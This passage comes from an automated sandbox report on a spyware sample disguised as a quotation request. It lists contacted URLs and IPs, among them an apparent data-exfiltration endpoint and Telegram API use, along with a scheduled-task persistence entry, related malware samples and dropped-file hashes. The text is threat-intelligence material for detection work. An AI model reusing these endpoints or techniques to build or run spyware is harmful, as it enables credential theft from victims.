                                                                              http://anotherarmy.dns.army:8081Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/8.46.123.75$Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000314A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://checkip.dyndns.org/qRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://chrome.google.com/webstore?hl=enlBRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003247000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.orgRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000310A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000A.00000002.1469660734.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://reallyfreegeoip.org/xml/Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  149.154.167.220
                                                                                                  api.telegram.orgUnited Kingdom
                                                                                                  62041TELEGRAMRUfalse
                                                                                                  188.114.97.3
                                                                                                  reallyfreegeoip.orgEuropean Union
                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                  193.122.6.168
                                                                                                  checkip.dyndns.comUnited States
                                                                                                  31898ORACLE-BMC-31898USfalse
                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1560113
                                                                                                  Start date and time:2024-11-21 12:19:11 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 9m 46s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:19
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@20/25@3/3
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 245
                                                                                                  • Number of non-executed functions: 7
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                  • VT rate limit hit for: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                  TimeTypeDescription
                                                                                                  06:20:06API Interceptor7537037x Sleep call for process: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe modified
                                                                                                  06:20:09API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                                  06:20:12API Interceptor5240598x Sleep call for process: NuDUTBObHpKADz.exe modified
                                                                                                  11:20:11Task SchedulerRun new task: NuDUTBObHpKADz path: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  149.154.167.220Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.rgenerousrs.store/o362/
                                                                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.beylikduzu616161.xyz/2nga/
                                                                                                                      Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                                      ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                      • paste.ee/d/lxvbq
                                                                                                                      Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                                      PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                      • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                      gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                      Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                      • gmtagency.online/api/check
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      reallyfreegeoip.orgNew_Order_PO-NG57283H9.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      z1MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      s-part-0017.t-0009.t-msedge.netAPPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      CB1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 13.107.246.45
                                                                                                                      api.telegram.orgWire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      ORACLE-BMC-31898USNew_Order_PO-NG57283H9.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      http://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=SepGet hashmaliciousUnknownBrowse
                                                                                                                      • 147.154.51.84
                                                                                                                      Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 193.122.130.0
                                                                                                                      BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 193.122.6.168
                                                                                                                      Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 158.101.44.242
                                                                                                                      TELEGRAMRUWire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      • 149.154.167.99
                                                                                                                      Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.12.205
                                                                                                                      wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                      • 172.64.41.3
                                                                                                                      New_Order_PO-NG57283H9.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      MDE_File_Sample_37ce4d95fd579c36340b1d1490e2ef7623af4bb3.zipGet hashmaliciousLummaCBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      http://newvideozones.clickGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adNew_Order_PO-NG57283H9.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      z1MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Benefit Enrollment -16oy1xb.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      file.exeGet hashmaliciousJasonRATBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eCHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      No context
                                                                                                                      Process:C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1216
                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                      Malicious:false
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                      Process:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1216
                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                      Malicious:true
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2232
                                                                                                                      Entropy (8bit):5.3792772635987225
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:bWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:bLHxvCsIfA2KRHmOugw1s
                                                                                                                      MD5:24BC35D470461ED90FC4BFFF902B8C7E
                                                                                                                      SHA1:0FA16F6526E5ECF142B47EF95DC7FF9F6C12734A
                                                                                                                      SHA-256:FF60D2E27C696044BADA174E175C85E8CACB9E310EDCAC365AE6864B38709EFF
                                                                                                                      SHA-512:584AAF5C4E5CBD704DA722965920F21FF80CC25A7B79E6D552E8BDF7A30416AEC3CC7D314A9A15630A6B8EBDEADBB3CDC7784927E8276788DEE2DFF8556617F4
                                                                                                                      Malicious:false
                                                                                                                      Preview:@...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
